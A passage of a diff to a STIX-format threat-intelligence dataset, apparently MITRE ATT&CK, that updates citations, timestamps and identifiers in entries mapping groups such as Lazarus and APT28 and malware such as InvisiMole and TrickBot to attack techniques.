"type": "relationship", - "modified": "2020-03-18T00:49:11.897Z", + "modified": "2020-08-17T14:08:26.556Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -71750,7 +76878,7 @@ "source_name": "Cobalt Strike TTPs Dec 2017" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6", "type": "relationship", @@ -71986,15 +77114,16 @@ ], "external_references": [ { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "type": "relationship", - "modified": "2020-03-17T02:22:39.564Z", + "modified": "2020-09-02T18:46:32.857Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -72257,22 +77386,27 @@ { "id": "relationship--66f5e718-f910-487f-852a-98a8d752b0ba", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has a command to create, set, copy, or delete a specified Registry key or value.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has a command to create, set, copy, or delete a specified Registry key or value.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", "type": "relationship", - "modified": "2020-03-17T00:09:26.121Z", + "modified": "2020-07-17T19:22:28.803Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -72367,7 +77501,7 @@ { "id": "relationship--c01c8bd2-0471-470c-aaab-4d4f96a27e9a", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) leveraged [Mimikatz](https://attack.mitre.org/software/S0002) to extract Windows Credentials of currently logged-in users and steals passwords stored in browsers.(Citation: Lazarus KillDisk)", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) leveraged [Mimikatz](https://attack.mitre.org/software/S0002) to extract Windows Credentials of currently logged-in users and steals passwords stored in browsers.(Citation: Lazarus KillDisk) [Lazarus Group](https://attack.mitre.org/groups/G0032) has also used a custom version [Mimikatz](https://attack.mitre.org/software/S0002) to capture credentials.(Citation: F-Secure Lazarus Cryptocurrency Aug 2020) ", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -72376,13 +77510,18 @@ "source_name": "Lazarus KillDisk", "description": "K\u00e1lnai, P., Cherepanov A. (2018, April 03). Lazarus KillDisks Central American casino. Retrieved May 17, 2018.", "url": "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/" + }, + { + "source_name": "F-Secure Lazarus Cryptocurrency Aug 2020", + "url": "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020." } ], "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", "relationship_type": "uses", "target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", "type": "relationship", - "modified": "2020-03-19T23:12:25.800Z", + "modified": "2020-09-22T18:22:30.727Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -72814,7 +77953,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", "type": "relationship", - "modified": "2020-03-29T20:35:55.547Z", + "modified": "2020-10-21T16:38:28.120Z", "created": "2017-05-31T21:33:27.029Z" }, { @@ -73166,22 +78305,27 @@ { "id": "relationship--9154afb8-abf6-4d9d-b114-5106d801338f", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can gather information on the mapped drives, OS version, computer name, and memory size.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can gather information on the mapped drives, OS version, computer name, DEP policy, memory size, and system volume serial number.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", "type": "relationship", - "modified": "2020-03-17T00:09:26.155Z", + "modified": "2020-09-02T19:00:21.028Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -73229,7 +78373,7 @@ { "id": "relationship--1f972385-7f1c-4cbd-a071-951973e6d229", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Some [MiniDuke](https://attack.mitre.org/software/S0051) components use Twitter to initially obtain the address of a C2 server or as a backup if no hard-coded C2 server responds.(Citation: F-Secure The Dukes)(Citation: Securelist MiniDuke Feb 2013)", + "description": "Some [MiniDuke](https://attack.mitre.org/software/S0051) components use Twitter to initially obtain the address of a C2 server or as a backup if no hard-coded C2 server responds.(Citation: F-Secure The Dukes)(Citation: Securelist MiniDuke Feb 2013)(Citation: ESET Dukes October 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -73243,13 +78387,18 @@ "source_name": "Securelist MiniDuke Feb 2013", "description": "Kaspersky Lab's Global Research & Analysis Team. (2013, February 27). The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor. Retrieved April 5, 2017.", "url": "https://cdn.securelist.com/files/2014/07/themysteryofthepdf0-dayassemblermicrobackdoor.pdf" + }, + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." } ], "source_ref": "malware--5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", "relationship_type": "uses", "target_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", "type": "relationship", - "modified": "2020-03-30T00:59:49.311Z", + "modified": "2020-10-09T16:07:59.075Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -73673,7 +78822,7 @@ { "id": "relationship--01aac35b-55e1-40d6-962f-5b5a6efdb2be", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[TrickBot](https://attack.mitre.org/software/S0266) gathers the OS version, CPU type, amount of RAM available from the victim\u2019s machine.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)", + "description": "[TrickBot](https://attack.mitre.org/software/S0266) gathers the OS version, machine name, CPU type, amount of RAM available from the victim\u2019s machine.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)(Citation: Cyberreason Anchor December 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -73687,13 +78836,18 @@ "source_name": "Fidelis TrickBot Oct 2016", "description": "Reaves, J. (2016, October 15). TrickBot: We Missed you, Dyre. Retrieved August 2, 2018.", "url": "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre" + }, + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." } ], "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", "relationship_type": "uses", "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", "type": "relationship", - "modified": "2019-06-24T19:15:06.617Z", + "modified": "2020-09-11T13:27:44.440Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -74311,7 +79465,7 @@ { "id": "relationship--7282eabe-73e0-4a10-824b-f18df7f892e2", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can upload, download, and execute files on the victim.(Citation: Symantec Dragonfly)", + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can upload, download, and execute files on the victim.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -74320,13 +79474,18 @@ "source_name": "Symantec Dragonfly", "description": "Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" + }, + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." } ], "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", "relationship_type": "uses", "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "type": "relationship", - "modified": "2020-03-17T15:08:58.234Z", + "modified": "2020-08-13T14:05:45.015Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -74501,7 +79660,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", "type": "relationship", @@ -75776,7 +80935,7 @@ "relationship_type": "uses", "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", "type": "relationship", - "modified": "2019-06-28T14:59:17.708Z", + "modified": "2020-10-08T14:44:54.343Z", "created": "2017-05-31T21:33:27.071Z" }, { @@ -75927,13 +81086,13 @@ "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" } ], - "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) has disabled anti-virus and anti-spyware tools in some instances on the victim\u2019s machines. The actors have also disabled proxy settings to allow direct communication from victims to the Internet.[(Citation: McAfee Night Dragon)", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) has disabled anti-virus and anti-spyware tools in some instances on the victim\u2019s machines. The actors have also disabled proxy settings to allow direct communication from victims to the Internet.(Citation: McAfee Night Dragon)", "id": "relationship--7c5c4ef2-2e0b-4c83-ae98-8f0f40cb6d3c", "source_ref": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", "relationship_type": "uses", "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", "type": "relationship", - "modified": "2019-03-25T14:36:29.845Z", + "modified": "2020-08-11T19:48:45.347Z", "created": "2019-01-30T18:02:59.190Z" }, { @@ -76091,7 +81250,7 @@ "source_name": "Cobalt Strike TTPs Dec 2017" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", "type": "relationship", @@ -76442,7 +81601,7 @@ "source_name": "GitHub Malleable C2" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00", "type": "relationship", @@ -77005,12 +82164,12 @@ "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" } ], - "type": "relationship", - "modified": "2018-10-17T00:14:20.652Z", - "created": "2018-10-17T00:14:20.652Z", "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", - "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e" + "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e", + "type": "relationship", + "modified": "2020-07-16T13:08:59.919Z", + "created": "2018-10-17T00:14:20.652Z" }, { "id": "relationship--1ec53623-4050-498b-ba9e-f149d203036c", @@ -77182,7 +82341,7 @@ ], "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e", "relationship_type": "uses", - "target_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "target_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "external_references": [ { "source_name": "FireEye APT32 May 2017", @@ -77859,7 +83018,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", "type": "relationship", @@ -77974,7 +83133,7 @@ { "id": "relationship--becf0a5e-4636-4d2f-bd4a-fd60b15ee74a", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) has a keylogger.(Citation: Alintanahin 2014)", + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) has a keylogger.(Citation: Alintanahin 2014)(Citation: Gh0stRAT ATT March 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -77983,13 +83142,18 @@ "source_name": "Alintanahin 2014", "description": "Alintanahin, K. (2014, March 13). Kunming Attack Leads to Gh0st RAT Variant. Retrieved November 12, 2014.", "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/kunming-attack-leads-to-gh0st-rat-variant/" + }, + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." } ], "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", "relationship_type": "uses", "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", "type": "relationship", - "modified": "2020-03-16T16:50:44.180Z", + "modified": "2020-07-15T19:28:00.779Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -78210,15 +83374,16 @@ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/" }, { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", "type": "relationship", - "modified": "2020-03-17T02:22:39.594Z", + "modified": "2020-09-02T18:46:32.930Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -78444,15 +83609,16 @@ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/" }, { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "type": "relationship", - "modified": "2020-03-17T02:22:39.558Z", + "modified": "2020-09-02T18:46:32.969Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -79540,7 +84706,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", "type": "relationship", - "modified": "2020-06-30T22:50:06.273Z", + "modified": "2020-10-12T12:16:55.317Z", "created": "2018-04-18T17:59:24.739Z" }, { @@ -80088,27 +85254,6 @@ "modified": "2019-07-16T15:35:20.961Z", "created": "2018-10-17T00:14:20.652Z" }, - { - "id": "relationship--eaaf6671-ead6-441b-b8d0-037a1e47572e", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "TRINITY malware used by [FIN6](https://attack.mitre.org/groups/G0037) identifies payment card track data on the victim and then copies it to a local file in a subdirectory of C:\\Windows\\.(Citation: FireEye FIN6 April 2016)", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "external_references": [ - { - "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", - "description": "FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.", - "source_name": "FireEye FIN6 April 2016" - } - ], - "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", - "relationship_type": "uses", - "target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", - "type": "relationship", - "modified": "2020-03-16T23:54:26.393Z", - "created": "2017-05-31T21:33:27.072Z" - }, { "id": "relationship--818b440b-075d-483d-83ff-9991a78e25f4", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -80709,15 +85854,16 @@ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/" }, { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", "type": "relationship", - "modified": "2020-03-17T02:22:39.576Z", + "modified": "2020-09-02T18:46:33.031Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -80734,7 +85880,7 @@ "source_name": "Cobalt Strike TTPs Dec 2017" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "type": "relationship", @@ -81270,7 +86416,7 @@ { "id": "relationship--73e0604a-2509-43a6-9318-a9494e570363", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[APT28](https://attack.mitre.org/groups/G0007) has retrieved internal documents from machines inside victim environments, including by using [Forfiles](https://attack.mitre.org/software/S0193) to stage documents before.(Citation: \u00dcberwachung APT28 Forfiles June 2015)(Citation: DOJ GRU Indictment Jul 2018)", + "description": "[APT28](https://attack.mitre.org/groups/G0007) has retrieved internal documents from machines inside victim environments, including by using [Forfiles](https://attack.mitre.org/software/S0193) to stage documents before exfiltration.(Citation: \u00dcberwachung APT28 Forfiles June 2015)(Citation: DOJ GRU Indictment Jul 2018)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -81290,7 +86436,7 @@ "relationship_type": "uses", "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "type": "relationship", - "modified": "2019-09-09T17:44:35.418Z", + "modified": "2020-08-04T20:56:21.201Z", "created": "2018-04-18T17:59:24.739Z" }, { @@ -81601,7 +86747,7 @@ { "id": "relationship--da395019-238a-4c4e-b4cd-43947e8aa019", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "To move laterally on a victim network, [FIN6](https://attack.mitre.org/groups/G0037) has used credentials stolen from various systems on which it gathered usernames and password hashes.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)", + "description": "To move laterally on a victim network, [FIN6](https://attack.mitre.org/groups/G0037) has used credentials stolen from various systems on which it gathered usernames and password hashes.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)(Citation: Visa FIN6 Feb 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -81615,13 +86761,18 @@ "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", "source_name": "FireEye FIN6 Apr 2019" + }, + { + "description": "Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.", + "url": "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf", + "source_name": "Visa FIN6 Feb 2019" } ], "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", "relationship_type": "uses", "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "type": "relationship", - "modified": "2019-06-28T14:59:17.773Z", + "modified": "2020-09-09T15:53:09.750Z", "created": "2017-05-31T21:33:27.072Z" }, { @@ -81664,11 +86815,16 @@ "source_name": "Symantec APT28 Oct 2018", "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government", "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018." + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." } ], - "description": "(Citation: ESET Sednit Part 3)(Citation: Symantec APT28 Oct 2018)", + "description": "(Citation: ESET Sednit Part 3)(Citation: Symantec APT28 Oct 2018)(Citation: US District Court Indictment GRU Oct 2018)", "type": "relationship", - "modified": "2019-09-18T15:14:13.467Z", + "modified": "2020-10-01T18:55:45.583Z", "created": "2017-05-31T21:33:27.041Z" }, { @@ -82007,7 +87163,7 @@ "relationship_type": "uses", "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", "type": "relationship", - "modified": "2019-09-09T19:15:45.234Z", + "modified": "2020-09-22T16:38:56.457Z", "created": "2017-05-31T21:33:27.066Z" }, { @@ -82087,7 +87243,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", "type": "relationship", @@ -82409,7 +87565,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", "type": "relationship", @@ -83489,7 +88645,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "type": "relationship", @@ -83935,7 +89091,7 @@ { "id": "relationship--699ddfef-6e95-42cf-b212-dc661f790adc", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families gather a list of running processes on a victim system and send it to their C2 server. A Destover-like variant used by [Lazarus Group](https://attack.mitre.org/groups/G0032) also gathers process times.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: McAfee GhostSecret)", + "description": "Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families gather a list of running processes on a victim system and send it to their C2 server. A Destover-like variant used by [Lazarus Group](https://attack.mitre.org/groups/G0032) also gathers process times.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: McAfee GhostSecret)(Citation: TrendMicro macOS Dacls May 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -83951,21 +89107,26 @@ "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf" }, { - "source_name": "McAfee Lazarus Resurfaces Feb 2018", + "url": "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", "description": "Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.", - "url": "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/" + "source_name": "McAfee Lazarus Resurfaces Feb 2018" }, { "url": "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/", "description": "Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.", "source_name": "McAfee GhostSecret" + }, + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." } ], "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", "relationship_type": "uses", "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "type": "relationship", - "modified": "2019-12-20T14:28:39.109Z", + "modified": "2020-08-10T13:25:16.258Z", "created": "2017-05-31T21:33:27.067Z" }, { @@ -85364,7 +90525,7 @@ { "id": "relationship--115562b8-9d7c-435e-af6e-0be6249742d0", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families are capable of downloading and executing binaries from its C2 server.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: Novetta Blockbuster Loaders)", + "description": "Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families are capable of downloading and executing binaries from its C2 server.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: Novetta Blockbuster Loaders)(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -85375,21 +90536,31 @@ "source_name": 